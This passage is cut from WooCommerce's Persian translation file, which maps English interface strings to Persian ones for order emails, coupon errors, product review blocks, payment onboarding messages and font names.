بازپرداخت جزئی یا کامل وجه سفارش','Send an email to customers notifying them that their order is being processed'=>'ارسال ایمیل به مشتریان و اطلاع رسانی در مورد پردازش سفارششان','Your %1$s order #%2$s has been refunded'=>'مبلغ سفارش %1$s شما #%2$s بازپرداخت شد.','Your %1$s order #%2$s has been partially refunded'=>'بخشی از مبلغ سفارش %1$s شما #%2$s بازپرداخت شد.','Thank you for your in-store purchase'=>'از خرید شما از فروشگاه متشکریم','Your in-store purchase #%1$s at %2$s'=>'خرید حضوری شما در فروشگاه #%1$s از %2$s','Send an email to customers notifying them when their order has been placed on hold'=>'ارسال ایمیل به مشتریان و اطلاع رسانی به آنها در مورد توقف سفارششان','Send an email to customers notifying them when you’ve added a note to their order'=>'ارسال ایمیل به مشتریان و اطلاع‌رسانی به آنها هنگام افزودن یادداشت به سفارششان','Send an email to customers notifying them that they have created an account'=>'ارسال ایمیل به مشتریان و اطلاع رسانی به آنها مبنی بر ایجاد حساب کاربری','Send an email to customers notifying them that their order is complete and has been shipped'=>'ارسال ایمیل به مشتریان و اطلاع رسانی به آنها مبنی بر تکمیل سفارش و ارسال آن','[{site_title}]: Your order #{order_number} has been cancelled'=>'[{site_title}]: سفارش شما با شماره #{order_number} لغو شد','Cancelled order emails are sent to customers when their orders have been marked cancelled (if they were previously processing or on-hold).'=>'ایمیل‌های سفارش لغو شده زمانی برای مشتریان ارسال می‌شوند که سفارش‌هایشان لغو شده علامت‌گذاری شده باشد (اگر قبلاً در حال پردازش یا در انتظار بوده باشند).','Send an email to customers notifying them when their order has been cancelled'=>'ارسال ایمیل به مشتریان و اطلاع رسانی به آنها در صورت لغو سفارششان','Receive an email notification when an order that was processing or on hold gets cancelled'=>'دریافت ایمیل اطلاع‌رسانی هنگام لغو سفارشی که در حال پردازش یا در حالت انتظار بود','Coupon "%s" cannot be applied because it does not exist.'=>'کوپن "%s" قابل اعمال نیست زیرا وجود ندارد.','Coupon "%s" cannot be applied because it is not valid.'=>'کوپن "%s" قابل اعمال نیست زیرا معتبر نیست.','Invalid maximum spend value.'=>'حداکثر مقدار خرج نامعتبر است.','Receive an email notification when an order that was processing or on hold fails'=>'دریافت ایمیل اطلاع‌رسانی در صورت عدم موفقیت سفارشی که در حال پردازش یا در حالت انتظار بوده است','Leave this box unchecked if you do not want to pull suggested extensions from WooCommerce.com.'=>'اگر نمی‌خواهید افزونه‌های پیشنهادی را از WooCommerce.com دریافت کنید، این کادر را علامت نزنید.','Details are not available for this customer as this user does not exist in the current site.'=>'جزئیات مربوط به این مشتری در دسترس نیست زیرا این کاربر در سایت فعلی وجود ندارد.','(Not available)'=>'(موجود نیست)','coupon expiry date placeholderYYYY-MM-DD'=>'YYYY-MM-DD','Helper cache cleared.'=>'حافظه پنهان کمکی پاک شد.','This tool will empty the WooCommerce.com data cache, used in WooCommerce Extensions.'=>'این ابزار حافظه پنهان داده WooCommerce.com را که در افزونه‌های ووکامرس استفاده می‌شود، خالی می‌کند.','Clear WooCommerce.com cache'=>'پاک کردن حافظه پنهان WooCommerce.com','Address autocomplete'=>'تکمیل خودکار آدرس','Enable predictive address search'=>'جستجوی آدرس پیش‌بینی‌شده را فعال کنید','Preferred address autocomplete provider'=>'ارائه دهنده تکمیل خودکار آدرس ترجیحی','Brief statement that will appear on the receipts.'=>'بیانیه مختصری که روی رسیدها ظاهر می‌شود.','Refund & Returns Policy'=>'سیاست بازپرداخت و بازگشت کالا','Your store contact email.'=>'ایمیل تماس فروشگاه شما.','Physical address'=>'آدرس فیزیکی','The name of your physical store.'=>'نام فروشگاه فیزیکی شما.','Store name'=>'نام فروشگاه','Details about the store that are shown in email receipts.'=>'جزئیات مربوط به فروشگاه که در رسیدهای ایمیل نشان داده می‌شوند.','Türkiye'=>'ترکیه','Suggest full addresses to customers as they type.'=>'آدرس‌های کامل را به مشتری پیشنهاد دهید، هنگامی که تایپ می‌کنند.','Unable to determine server architecture. Please ask your hosting provider for this information.'=>'نمی توان معماری سرور را تعیین کرد. لطفاً این اطلاعات را از ارائه دهنده هاست خود بخواهید.','Some subscription data may be temporarily unavailable. Please refresh the page in a few minutes to try again.'=>'برخی از داده های اشتراک ممکن است به طور موقت در دسترس نباشند. لطفاً چند دقیقه دیگر صفحه را بازخوانی کنید تا دوباره امتحان کنید.','We’re having trouble connecting to WooCommerce.com'=>'ما برای اتصال به WooCommerce.com مشکل داریم','block titleProduct Title'=>'عنوان محصول','block keywordweight'=>'وزن','block titleReviews Title'=>'عنوان نقد و بررسی‌ها','block descriptionDisplay product weight, dimensions, and attributes.'=>'نمایش وزن، ابعاد و ویژگی‌های محصول','block descriptionDisplay the title of a product.'=>'نمایش عنوان یک محصول.','block titleReviews Pagination'=>'صفحه‌بندی نقد و بررسی‌ها','block titleReviews by Product'=>'بررسی‌ها بر اساس محصول','block titleReviews by Category'=>'بررسی‌ها بر اساس دسته','block titleReviews Previous Page'=>'برگه قبلی بررسی‌ها','block descriptionLet shoppers know when products are out of stock or on backorder. This block is hidden when products are in stock.'=>'به خریداران اطلاع دهید که چه زمانی محصولات موجود نیستند یا سفارش آنها لغو شده است. این بلوک زمانی که محصولات موجود هستند پنهان می‌شود.','block descriptionDisplay reviews for your products.'=>'نظرات مربوط به محصولات خود را نمایش دهید.','block descriptionShow product reviews from specific categories.'=>'نمایش نظرات مربوط به محصولات از دسته بندی های خاص.','block titleProduct Stock Indicator'=>'شاخص موجودی محصول','block keywordadditional information'=>'اطلاعات تکمیلی','block titleProduct Specifications'=>'مشخصات محصول','block titleProduct SKU'=>'شناسه محصول','block descriptionDisplays a title with the number of reviews.'=>'عنوانی را به همراه تعداد نظرات نمایش می‌دهد.','block descriptionDisplays a paginated navigation to next/previous set of product reviews, when applicable.'=>'در صورت لزوم، یک ناوبری صفحه‌بندی شده به مجموعه بعدی/قبلی نقد و بررسی‌های محصول نمایش می‌دهد.','block descriptionDisplays the previous product review\'s page link.'=>'لینک صفحه نقد و بررسی محصول قبلی را نمایش می‌دهد.','block descriptionDisplays a list of page numbers for product reviews pagination.'=>'فهرستی از شماره صفحات را برای صفحه‌بندی نقد و بررسی محصولات نمایش می‌دهد.','block descriptionDisplays the SKU of a product.'=>'شناسه یک محصول را نمایش می‌دهد.','block titleReviews Next Page'=>'برگه بعدی بررسی‌ها','block titleReviews Template'=>'الگوی نقد و بررسی‌ها','block titleReviews Form'=>'فرم نقد و بررسی‌ها','block titleOn Sale Products'=>'محصولات حراج شده','block descriptionDisplays the description of the product.'=>'توضیح محصول را نمایش می‌دهد.','block titleProduct Description'=>'توضیح محصول','block descriptionContains the block elements used to display product reviews, like the title, author, date, rating and more.'=>'شامل عناصر بلوکی است که برای نمایش نقد و بررسی محصولات، مانند عنوان، نویسنده، تاریخ، رتبه‌بندی و موارد دیگر استفاده می‌شوند.','block descriptionDisplays the rating of a product review.'=>'امتیاز یک نقد و بررسی محصول را نمایش می‌دهد.','block titleReview Rating'=>'امتیازهای دیدگاه','block descriptionDisplay a product\'s reviews form.'=>'فرم نظرات یک محصول را نمایش دهید.','block descriptionDisplays the date on which the review was posted.'=>'تاریخ ارسال نظر را نمایش می‌دهد.','block descriptionDisplays the contents of a product review.'=>'محتوای نقد و بررسی محصول را نمایش می‌دهد.','block descriptionDisplays the name of the author of the review.'=>'نام نویسنده نقد را نمایش می‌دهد.','block titleReview Author Name'=>'نام نویسنده نقد','block descriptionDisplay a grid of products currently on sale.'=>'نمایش شبکه‌ای از محصولاتی که در حال حاضر در حراج هستند.','block titleProduct Filters'=>'فیلترهای محصولات','block titleClear filters'=>'پاک کردن فیلترها','block descriptionDisplay a product\'s reviews'=>'نمایش نظرات یک محصول','block descriptionShow a list of all product reviews.'=>'نمایش لیستی از تمام نظرات مربوط به محصول.','block titleAll Reviews'=>'همه دیدگاه‌ها','block titleVariation Selector: Attribute Name (Beta)'=>'نام ویژگی انتخابگر تنوع (آزمایشی)','block titleReviews Page Numbers'=>'شمارهٔ برگه نقد و بررسی‌ها','block descriptionDisplays the next product review\'s page link.'=>'پیوند صفحهٔ نقد و بررسی محصول بعدی را نمایش می‌دهد.','Anonymous'=>'ناشناس','block titleReview Date'=>'تاریخ دیدگاه','block titleReview Content'=>'محتوای نقد و بررسی','Email content'=>'محتوای ایمیل','Default block content'=>'محتوای بلوک پیشفرض','Just to let you know — we’ve received your order, and it is now being processed.'=>'صرفاً جهت اطلاع شما - سفارش شما را دریافت کرده‌ایم و اکنون در حال پردازش است.','Order refunded: %s'=>'مبلغ سفارش مسترد شد: %s','Details for order #%s,'=>'جزئیات سفارش #%s،','Thanks again! If you need any help with your order, please contact us at %s.'=>'دوباره متشکرم! اگر در مورد سفارش خود به هرگونه کمکی نیاز دارید، لطفاً با ما از طریق %s تماس بگیرید.','Store Name'=>'نام فروشگاه','Store URL'=>'URL فروشگاه','My Account URL'=>'URL حساب کاربری من','Store'=>'فروشگاه','Store Email'=>'ایمیل فروشگاه','Payment URL'=>'URL پرداخت','Order Tax'=>'مالیات سفارش','Order Subtotal'=>'جمع جزء سفارش','Order Items'=>'موارد سفارش','Customer Country'=>'کشور مشتری','Customer Username'=>'نام کاربری مشتری','Customer Full Name'=>'نام کامل مشتری','Customer Last Name'=>'نام خانوادگی مشتری','Customer First Name'=>'نام مشتری','Admin Order Note'=>'یادداشت سفارش مدیر','Invalid email address provided for sender settings'=>'آدرس ایمیل نامعتبر برای تنظیمات فرستنده ارائه شده است','Allows entering cost of goods sold information for products.'=>'امکان وارد کردن اطلاعات بهای تمام شده کالای فروش رفته برای محصولات را فراهم می‌کند.','REST request POST %1$s failed with: (%2$s) %3$s'=>'درخواست REST ارسال %1$s با شکست مواجه شد: (%2$s) %3$s','REST request GET %1$s failed with: (%2$s) %3$s'=>'درخواست REST برای %1$s با شکست مواجه شد: (%2$s) %3$s','The URL to do onboarding preload for the payment gateway.'=>'آدرس اینترنتی (URL) برای انجام پیش‌بارگذاری آن‌بوردینگ (Onboarding) برای درگاه پرداخت.','The onboarding preload link for the payment gateway.'=>'لینک پیش‌دانلود برای درگاه پرداخت.','The type of onboarding process the provider supports.'=>'نوع فرآیند پذیرش سازمانی که ارائه دهنده پشتیبانی می‌کند.','The status of the containing entity.'=>'وضعیت موجودیتِ دربرگیرنده.','The slug of the containing entity.'=>'نامک (slug) مربوط به موجودیتِ در برگیرنده.','The type of the containing entity. Generally this is a regular plugin but it can also be a non-standard entity like a theme or a must-user plugin.'=>'نوع موجودیت حاوی. عموماً این یک افزونه معمولی است اما می‌تواند یک موجودیت غیراستاندارد مانند یک قالب یا یک افزونه ضروری نیز باشد.','Order failed: #%s,'=>'سفارش ناموفق بود: #%s,','Invalid coupons were removed from the order: "%s"'=>'کوپن‌های نامعتبر از سفارش حذف شدند: "%s"','"%1$s" was removed from the order. %2$s'=>'«%1$s» از سفارش حذف شد. %2$s','Button text in the single product page.'=>'متن دکمه در صفحه محصول تکی.','New order: #%s'=>'سفارش جدید: #%s','The provider ID must be a string with only ASCII letters, digits, underscores, and dashes.'=>'شناسه ارائه دهنده باید رشته‌ای باشد که فقط شامل حروف ASCII، اعداد، زیرخط و خط تیره باشد.','If true, the incentive dismissal will be ignored by tracking.'=>'اگر درست باشد، اخراج تشویقی با ردیابی نادیده گرفته می‌شود.','Failed to get onboarding fields data.'=>'دریافت داده‌های فیلدهای ورود به سیستم ناموفق بود.','The onboarding step ID is invalid: %s'=>'شناسه مرحله ورود نامعتبر است: %s','Failed to initialize the test account.'=>'مقداردهی اولیه حساب آزمایشی انجام نشد.','Received an unexpected response from the platform.'=>'پاسخی غیرمنتظره از پلتفرم دریافت کردم.','An unexpected error happened while initializing the test account.'=>'هنگام مقداردهی اولیه حساب آزمایشی، خطای غیرمنتظره‌ای رخ داد.','An account is already set up. Reset the onboarding first.'=>'یک حساب کاربری از قبل تنظیم شده است. ابتدا مراحل ورود به سیستم را مجدداً تنظیم کنید.','A test account is already set up.'=>'یک حساب آزمایشی از قبل ایجاد شده است.','Save action not supported for the onboarding step ID.'=>'ذخیره عملیات برای شناسه مرحله ورود به سیستم پشتیبانی نمی‌شود.','Invalid onboarding step data.'=>'داده‌های مربوط به مراحل ثبت‌نام نامعتبر است.','Invalid onboarding step ID.'=>'شناسه مرحله ورود نامعتبر است.','The URL to use for the action.'=>'آدرس اینترنتی (URL) مورد استفاده برای اقدام.','The action type to determine how to use the URL.'=>'نوع عملی که نحوه استفاده از URL را تعیین می‌کند.','Various contextual data for the onboarding process to use.'=>'داده‌های زمینه‌ای متنوع برای استفاده در فرآیند جذب و استخدام.','Various contextual data for the step to use.'=>'داده‌های زمینه‌ای متنوع برای استفاده در هر مرحله.','Action to use as a fallback when dealing with errors with the embedded KYC.'=>'اقدامی که به عنوان جایگزین هنگام مواجهه با خطاها در فرآیند احراز هویت تعبیه‌شده استفاده می‌شود.','The onboarding step is missing required entries: %s'=>'مرحله‌ی ورود به سیستم فاقد ورودی‌های مورد نیاز است: %s','There are environment or store setup issues which are blocking progress. Please resolve them to proceed.'=>'مشکلاتی در محیط یا تنظیمات فروشگاه وجود دارد که مانع پیشرفت می‌شوند. لطفاً برای ادامه، آنها را برطرف کنید.','Onboarding step requirements are not met.'=>'الزامات مرحله پذیرش برآورده نشده است.','The %s extension is not up-to-date. Please update to the latest version and try again.'=>'افزونه‌ی %s به‌روزرسانی نشده است. لطفاً آن را به آخرین نسخه به‌روزرسانی کرده و دوباره امتحان کنید.','The %s extension is not active.'=>'افزونه‌ی %s فعال نیست.','Failed to disable the test account.'=>'غیرفعال کردن حساب آزمایشی ناموفق بود.','An unexpected error happened while disabling the test account.'=>'هنگام غیرفعال کردن حساب آزمایشی، خطای غیرمنتظره‌ای رخ داد.','Failed to reset onboarding.'=>'تنظیم مجدد ورود به سیستم ناموفق بود.','An unexpected error happened while resetting onboarding.'=>'هنگام تنظیم مجدد ورود به سیستم، خطای غیرمنتظره‌ای رخ داد.','Another onboarding action is already in progress. Please wait for it to finish.'=>'یک اقدام دیگر برای ورود به سیستم در حال انجام است. لطفاً منتظر بمانید تا تمام شود.','Failed to finish the KYC session.'=>'جلسه KYC به پایان نرسید.','An unexpected error happened while finalizing the KYC session.'=>'هنگام نهایی کردن جلسه KYC، خطای غیرمنتظره‌ای رخ داد.','Failed to get the KYC session data.'=>'دریافت داده‌های جلسه KYC ناموفق بود.','An unexpected error happened while creating the KYC session.'=>'An unexpected error happened while creating the KYC session.','Action to finish an embedded KYC session.'=>'اقدام برای پایان دادن به یک جلسه احراز هویت مشتری (KYC) تعبیه‌شده.','Print discounted USPS, UPS, and DHL labels'=>'برچسب‌های تخفیف‌دار USPS، UPS و DHL را چاپ کنید.','Save on shipping with WooCommerce Shipping'=>'با افزونه WooCommerce Shipping در هزینه ارسال صرفه‌جویی کنید','Point of Sale'=>'مکان فروش','Try the new templates'=>'قالب‌های جدید را امتحان کنید','We’ve made some exciting improvements to our email templates, including modern, shopper-friendly designs and new customization options. And if you’re using a block theme, you can automatically sync your theme styles! Head to your email settings to explore the new features.'=>'ما پیشرفت‌های هیجان‌انگیزی در قالب‌های ایمیل خود ایجاد کرده‌ایم، از جمله طرح‌های مدرن و مناسب برای خریداران و گزینه‌های سفارشی‌سازی جدید. و اگر از یک قالب بلوکی استفاده می‌کنید، می‌توانید سبک‌های قالب خود را به طور خودکار همگام‌سازی کنید! برای بررسی ویژگی‌های جدید، به تنظیمات ایمیل خود بروید.','The available actions for the step.'=>'اقدامات موجود برای هر مرحله.','Errors list for the step.'=>'Errors list for the step.','The current status of the step.'=>'وضعیت فعلی مرحله.','The steps that are required to be completed before this step.'=>'مراحلی که قبل از این مرحله باید انجام شوند.','The relative path of the step to use for frontend navigation.'=>'مسیر نسبی مرحله‌ای که برای ناوبری فرانت‌اند استفاده می‌شود.','The unique identifier for the step.'=>'شناسه منحصر به فرد برای مرحله.','The onboarding steps.'=>'مراحل پذیرش (onboarding)','Whether the onboarding process is in test mode.'=>'آیا فرآیند جذب و پذیرش در حالت آزمایشی است یا خیر.','Whether WooPayments is in dev mode.'=>'آیا WooPayments در حالت توسعه (dev mode) است یا خیر.','The general state of the onboarding process.'=>'وضعیت کلی فرآیند پذیرش سازمانی.','Where from in the onboarding flow this request was triggered.'=>'این درخواست از کجای فرآیند آن‌بوردینگ (آشنایی با کاربران) فعال شده است؟','The upmost entry point from where the merchant entered the onboarding flow.'=>'بالاترین نقطه ورود، جایی که فروشنده وارد جریان آن‌بوردینگ شده است.','ISO3166 alpha-2 country code. Defaults to the stored providers business location country code.'=>'کد کشور ISO3166 alpha-2. پیش‌فرض‌ها کد کشور محل کسب و کار ارائه دهندگان ذخیره شده است.','Action to create or resume an embedded KYC session.'=>'اقدام برای ایجاد یا از سرگیری یک جلسه احراز هویت مشتری (KYC) تعبیه‌شده.','Action to initialize a test account.'=>'اقدام برای راه‌اندازی اولیه یک حساب آزمایشی.','Action to authorize the WPCOM connection.'=>'اقدام برای تأیید اتصال WPCOM.','Action to clean the step progress.'=>'اقدام برای تمیز کردن پیشرفت مرحله.','Action to signal the step completion.'=>'عملی برای اعلام تکمیل مرحله.','Action to check the step status.'=>'اقدام برای بررسی وضعیت مرحله.','Action to save step information in the database.'=>'اقدام برای ذخیره اطلاعات مرحله در پایگاه داده.','Action to signal the step start.'=>'اقدامی برای اعلام شروع گام.','Store emails have had an upgrade!'=>'ایمیل‌های فروشگاه ارتقا یافته‌اند!','Customize your emails'=>'ایمیل‌هایتان را سفارشی کنید','We’ve made some exciting improvements to your email templates, including modern, shopper-friendly designs and new customization options. And if you’re using a block theme, you can automatically sync your theme styles! Head to your email settings to explore the new changes.'=>'ما پیشرفت‌های هیجان‌انگیزی در قالب‌های ایمیل شما ایجاد کرده‌ایم، از جمله طرح‌های مدرن و مناسب برای خریداران و گزینه‌های سفارشی‌سازی جدید. و اگر از یک قالب بلوکی استفاده می‌کنید، می‌توانید سبک‌های قالب خود را به طور خودکار همگام‌سازی کنید! برای بررسی تغییرات جدید، به تنظیمات ایمیل خود بروید.','One review'=>'یک نقد و بررسی','Reviews for %s'=>'نقد و بررسی‌ها برای %s','Review for %s'=>'نقد و بررسی برای %s','Older Reviews'=>'نقد و بررسی‌های قدیمی‌تر','Newer Reviews'=>'نقد و بررسی‌های جدیدتر','%s ago'=>'%s قبل','Your store emails have had an upgrade!'=>'ایمیل‌های فروشگاه شما ارتقا یافته‌اند!','There was an error rendering the email editor placeholder content.'=>'خطایی در رندر کردن محتوای جایگذاری ویرایشگر ایمیل رخ داده است.','Invalid product object.'=>'آیتم محصول نامعتبر است.','Your review is awaiting moderation. This is a preview; your review will be visible after it has been approved.'=>'نظر شما در انتظار بررسی است. این یک پیش‌نمایش است؛ نظر شما پس از تأیید قابل مشاهده خواهد بود.','Your review is awaiting moderation.'=>'انتقاد شما در انتظار بررسی است.','[product description rendering halted]'=>'[رندرینگ توضیحات محصول متوقف شد]','The admin note type prop is deprecated.'=>'مشخصه نوع یادداشت مدیر منسوخ شده است.','Whether blueprint imports are currently allowed'=>'آیا واردات طرح توجیهی در حال حاضر مجاز است؟','Blueprint imports are disabled'=>'واردات طرح اولیه غیرفعال است','Sorry, you cannot import WooCommerce Blueprints.'=>'متاسفیم، شما نمی‌توانید طرح‌های ووکامرس را وارد کنید.','Pickup cost: %s'=>'هزینه دریافت حضوری: %s','Sorry, you cannot export WooCommerce Blueprints.'=>'متاسفیم، شما نمی‌توانید طرح‌های ووکامرس را خروجی بگیرید.','Includes all the installed plugins.'=>'شامل تمام افزونه‌های نصب شده.','Total value of the Cost of Goods Sold for the refund.'=>'ارزش کل بهای تمام شده کالای فروش رفته برای بازپرداخت.','Enabled features.'=>'ویژگی‌های فعال شده','Server architecture.'=>'معماری سرور.','Order refunded emails are sent to customers when their POS orders are refunded.'=>'ایمیل‌های بازپرداخت سفارش، زمانی که سفارش‌های POS مشتریان بازپرداخت می‌شود، برای آنها ارسال می‌شود.','Let customers know when a full or partial refund is on its way to them for their POS order.'=>'به خریداران اطلاع دهید که چه زمانی بازپرداخت کامل یا جزئی برای سفارش POS آنها در راه است.','POS refunded order'=>'سفارش بازپرداخت شده از طریق POS','Time of payment:'=>'زمان پرداخت:','Auth code:'=>'کد تایید:','Change due:'=>'تغییر ناشی از:','Order complete emails are sent to customers when their POS orders are marked completed.'=>'ایمیل‌های تکمیل سفارش زمانی برای مشتریان ارسال می‌شوند که سفارش‌های POS آنها با علامت «تکمیل‌شده» علامت‌گذاری شده باشد.','Let customers know once their POS order is complete.'=>'به محض تکمیل سفارش POS، به خریداران اطلاع دهید.','POS completed order'=>'سفارش تکمیل‌شده توسط POS','Cost per unit: %s'=>'هزینه هر واحد: %s','Sorry, coupon "%1$s" is not applicable to the categories: %2$s.'=>'متاسفانه، کوپن "%1$s" برای دسته‌های %2$s قابل استفاده نیست.','Sorry, coupon "%1$s" is not applicable to the products: %2$s.'=>'متاسفانه، کوپن "%1$s" برای محصولات %2$s قابل استفاده نیست.','Remove %s coupon'=>'کوپن %s را حذف کنید','Limit results to those with a name or SKU that partial matches a string. This argument takes precedence over \'search\', \'sku\' and \'search_sku\'.'=>'نتایج را به مواردی محدود کنید که نام یا SKU آنها تا حدی با یک رشته مطابقت دارد. این آرگومان بر \'search\'، \'sku\' و \'search_sku\' اولویت دارد.','Limit results to those with a SKU that partial matches a string. This argument takes precedence over \'sku\'.'=>'نتایج را به مواردی محدود کنید که SKU آنها تا حدی با یک رشته مطابقت دارد. این آرگومان بر \'sku\' اولویت دارد.','Brand ID.'=>'شناسه برند.','List of brands.'=>'فهرست برندها.','Limit result set to orders created via specific sources (e.g. checkout, admin).'=>'محدود کردن مجموعه نتایج به سفارش‌های ایجاد شده از طریق منابع خاص (مثلاً پرداخت، مدیریت).','Value of the Cost of Goods Sold for the refund item.'=>'ارزش بهای تمام شده کالای فروخته شده برای کالای مرجوعی.','Cost of Goods Sold data. Only present for product refund line items.'=>'داده‌های بهای تمام‌شده کالای فروش رفته. فقط برای اقلام خط بازپرداخت محصول ارائه می‌شود.','Brand slug.'=>'نامک برند.','Brand name.'=>'نام برند.','Are you sure want to revert to legacy? Doing so will erase any changes you’ve made to your new email templates, and will restore your previous email designs.'=>'آیا مطمئن هستید که می‌خواهید به نسخه قدیمی برگردید؟ انجام این کار هرگونه تغییری را که در قالب‌های ایمیل جدید خود ایجاد کرده‌اید پاک می‌کند و طرح‌های ایمیل قبلی شما را بازیابی می‌کند.','Usage limit for coupon "%s" has been reached. Please try again after some time, or contact us for help.'=>'محدودیت استفاده از کوپن "%s" به پایان رسیده است. لطفاً پس از مدتی دوباره امتحان کنید یا برای راهنمایی با ما تماس بگیرید.','The maximum spend for coupon "%1$s" is %2$s.'=>'حداکثر هزینه برای کوپن "%1$s" %2$s است.','The minimum spend for coupon "%1$s" is %2$s.'=>'حداقل هزینه برای کوپن "%1$s" %2$s است.','Coupon "%s" has expired.'=>'کوپن «%s» منقضی شده است.','Usage limit for coupon "%s" has been reached.'=>'محدودیت استفاده از کوپن "%s" به پایان رسیده است.','Features that are currently enabled.'=>'امکاناتی که در حال حاضر فعال هستند.','Enabled features:'=>'ویژگی‌های فعال شده:','Information about the operating system your server is running.'=>'اطلاعات مربوط به سیستم عاملی که سرور شما در حال اجرا دارد.','Server architecture'=>'معماری سرور','You are about to export %1$d product. To export all products, clear your selection.'=>'شما در شرف صادر کردن %1$d محصول هستید. برای صادر کردن همه محصولات، انتخاب خود را پاک کنید.','Hide shipping rates when free shipping is available'=>'پنهان کردن نرخ ارسال در صورت رایگان بودن ارسال','Revert to legacy template'=>'بازگشت به الگوی قدیمی','This tool allows you to generate and download a CSV file containing the selected products.'=>'این ابزار به شما اجازه می‌دهد یک فایل CSV حاوی محصولات انتخاب شده را ایجاد و دریافت کنید.','Try our new email templates!'=>'قالب‌های ایمیل جدید ما را امتحان کنید!','Keep legacy template'=>'الگوی قدیمی را نگه دارید','Switch to new template'=>'تغییر به قالب جدید','Previewing new template designs. You can customize and test your emails and switch to the new template whenever you are ready.'=>'پیش‌نمایش طرح‌های قالب جدید. می‌توانید ایمیل‌های خود را سفارشی‌سازی و آزمایش کنید و هر زمان که آماده بودید، به قالب جدید بروید.','Email improvements button'=>'دکمه بهبود ایمیل','Try new templates'=>'قالب‌های جدید را امتحان کنید','Cost Total'=>'کل هزینه','Your site is currently connected to WooCommerce.com using %1$s, but your actual site URL is %2$s. To fix this, please reconnect your site to WooCommerce.com to ensure everything works correctly.'=>'سایت شما در حال حاضر با استفاده از %1$s به WooCommerce.com متصل است، اما آدرس واقعی سایت شما %2$s است. برای رفع این مشکل، لطفاً سایت خود را دوباره به WooCommerce.com متصل کنید تا مطمئن شوید همه چیز به درستی کار می‌کند.','You can specify a default value for all variations'=>'شما می‌توانید برای همه تنوع‌ها، یک مقدار پیش‌فرض تعیین کنید.','WooCommerce.com API returned HTTP status code %d.'=>'API ووکامرس کد وضعیت HTTP %d را برگرداند.','You have exceeded the request limit. Please try again after a few minutes.'=>'شما از محدودیت درخواست فراتر رفته‌اید. لطفاً پس از چند دقیقه دوباره امتحان کنید.','WooCommerce.com API returned an invalid response.'=>'رابط برنامه‌نویسی کاربردی WooCommerce.com پاسخ نامعتبری را برگرداند.','The plugin for your subscription couldn\'t be activated.'=>'افزونه‌ی مربوط به اشتراک شما فعال نشد.','The plugin for your subscription has been activated.'=>'افزونه مربوط به اشتراک شما فعال شده است.','Authentication failed. Please try again after a few minutes. If the issue persists, disconnect your store from WooCommerce.com and reconnect.'=>'احراز هویت ناموفق بود. لطفاً پس از چند دقیقه دوباره امتحان کنید. اگر مشکل همچنان ادامه داشت، فروشگاه خود را از WooCommerce.com جدا کرده و دوباره متصل شوید.','API response is missing required elements, or they are in the wrong form.'=>'پاسخ API عناصر مورد نیاز را ندارد، یا به شکل نادرستی هستند.','We couldn\'t find a preview for this product.'=>'ما نتوانستیم پیش‌نمایشی برای این محصول پیدا کنیم.','There was an error rendering the email preview.'=>'خطایی در نمایش پیش‌نمایش ایمیل رخ داد.','There was an error rendering the email preview. This doesn\'t affect actual email delivery. Please contact the extension author for assistance.'=>'خطایی در نمایش پیش‌نمایش ایمیل رخ داده است. این مشکل تاثیری بر تحویل ایمیل ندارد. لطفاً برای راهنمایی با نویسنده افزونه تماس بگیرید.','Loading status data...'=>'در حال بارگذاری داده‌های وضعیت...','Export %d selected'=>'برون‌بری %d انتخاب شده','The dismissals list for the incentive. Each dismissal entry includes a context and a timestamp. The `all` entry means the incentive was dismissed for all contexts.'=>'لیست موارد رد شده برای مشوق. هر ورودی رد شده شامل یک زمینه و یک مهر زمانی است. ورودی «همه» به این معنی است که مشوق برای همه زمینه‌ها رد شده است.','File path is not a valid upload path.'=>'مسیر فایل، مسیر آپلود معتبری نیست.','Unix timestamp representing when the incentive was dismissed.'=>'زمان یونیکس که نشان می‌دهد چه زمانی انگیزه رد شده است.','Return to shipping'=>'بازگشت به حمل و نقل','Font size nameextra-large'=>'بسیار بزرگ','Font size namelarge'=>'بزرگ','Font size namemedium'=>'متوسط','Font size namesmall'=>'کوچک','Font family namePacifico'=>'Pacifico','Font family namePermanent Marker'=>'Permanent Marker','Font family nameRaleway'=>'Raleway','Font family nameOswald'=>'Oswald','Font family nameSource Sans Pro'=>'Source Sans Pro','Font family nameRoboto'=>'Roboto','Font family namePlayfair Display'=>'Playfair Display','Font family nameOpen Sans'=>'Open Sans','Font family nameNoticia Text'=>'Noticia Text','Font family nameMerriweather Sans'=>'Merriweather Sans','Font family nameMerriweather'=>'Merriweather','Font family nameLora'=>'Lora','Font family nameLato'=>'Lato','Font family nameArvo'=>'Arvo','Font family nameVerdana'=>'Verdana','Font family nameTrebuchet MS'=>'Trebuchet MS','Font family nameTimes New Roman'=>'Times New Roman','Font family nameTahoma'=>'Tahoma','Font family nameLucida'=>'Lucida','Font family nameGeorgia'=>'Georgia','Font family nameCourier New'=>'Courier New','Font family nameComic Sans MS'=>'Comic Sans MS','Font family nameArial'=>'Arial','Space size name6'=>'6','Space size name5'=>'5','Space size name4'=>'4','Space size name3'=>'3','Space size name2'=>'2','Space size name1'=>'1','block titleAccordion'=>'آکاردئون','block descriptionAccordion Panel'=>'پنل آکوردئون','block titleAccordion Panel'=>'پنل آکوردئون','block titleAccordion Header'=>'سربرگ آکاردئون','block descriptionAccordion header.'=>'سربرگ آکاردئون.','block descriptionA single accordion that displays a header and expandable content.'=>'آکاردئونی تکی که سربرگ و محتوای قابل گسترش را نمایش می‌دهد.','block descriptionA group of headers and associated expandable content.'=>'گروهی از سربرگ‌ها و محتوای قابل گسترش مرتبط.','block titleAccordion Group'=>'گروه آکاردئون','block descriptionDisplay a product\'s description, attributes, and reviews'=>'نمایش توضیحات، ویژگی‌ها و نظرات یک محصول','block descriptionA list item template that represents a child product within the Grouped Product Selector block.'=>'قالب یک آیتم فهرست که محصول فرزند را درون بلوک گزینش‌گر محصول گروهی نمایش می‌دهد.','block descriptionDisplay a group of products that can be added to the cart.'=>'نمایش گروهی از محصولات که قابل افزودن به سبد خرید هستند.','block keywordclear filters'=>'پاک‌سازی فیلتر‌ها','block titleGrouped Product Selector (Beta)'=>'انتخابگر محصول گروهی (بتا)','If you didn’t make this request, just ignore this email. If you’d like to proceed, reset your password via the link below:'=>'اگر شما این درخواست را نداده‌اید، فقط این ایمیل را نادیده بگیرید. اگر می‌خواهید ادامه دهید، رمز عبور خود را از طریق پیوند زیر بازنشانی کنید:','Order #%1$s (%2$s)'=>'سفارش #%1$s (%2$s)','Buy one of %1$s for %2$s'=>'یکی از %1$s را با قیمت %2$s بخرید','Buy one of %1$s on sale for %2$s, original price was %3$s'=>'یکی از %1$s را در حراج با قیمت %2$s بخرید، قیمت اصلی %3$s بود','Username: %s.'=>'نام کاربری: %s.','Your order from %s has been 